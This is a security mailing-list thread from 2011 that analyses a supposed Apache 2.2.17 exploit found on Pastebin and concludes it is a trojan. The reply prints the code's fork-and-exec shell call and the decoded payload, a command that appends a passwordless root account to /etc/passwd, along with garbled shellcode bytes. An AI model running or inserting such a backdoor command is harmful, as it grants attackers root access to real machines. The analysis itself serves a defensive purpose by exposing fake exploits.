Re: Apache 2.2.17 exploit?

[Security Mailing List <s3clist () hotmail com>]

Yeah, sure it is.

 1.
    if (fork() == 0)
 2.
                    execl("/bin/sh", "sh", "-c", evil, 0);
 3.
              else
 4.
                    wait(NULL);

This line shows that the code will run "/bin/sh" on local machine and it
has evil[] as a parameter. By decoding evil[], I can get
"?*^1??F??F??FG?vI?^??^M?^??^Q?FU?????NI?VU???????/bin/sh#-c#/bin/echo
w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD"

The illegible characters before the first "/bin/sh" could be an assembly
code intended to do evil thing on the local machine. I have not tested
but I assume that it would add a user to a machine that runs this code :D


On 10/4/2011 12:32 AM, Laurelai wrote:
> On 10/3/2011 7:31 AM, Darren Martyn wrote:
> > I regularly trawl Pastebin.com to find code - often idiots leave some
> > 0day and similar there and it is nice to find.
> >
> > Well, seeing as I have no test boxes at the moment, can someone check
> > this code in a VM? I am not sure if it is legit or not.
> >
> > http://pastebin.com/ygByEV2e
> >
> > Thanks :)
> >
> > ~Darren
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> Pretty sure its a trojan.
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/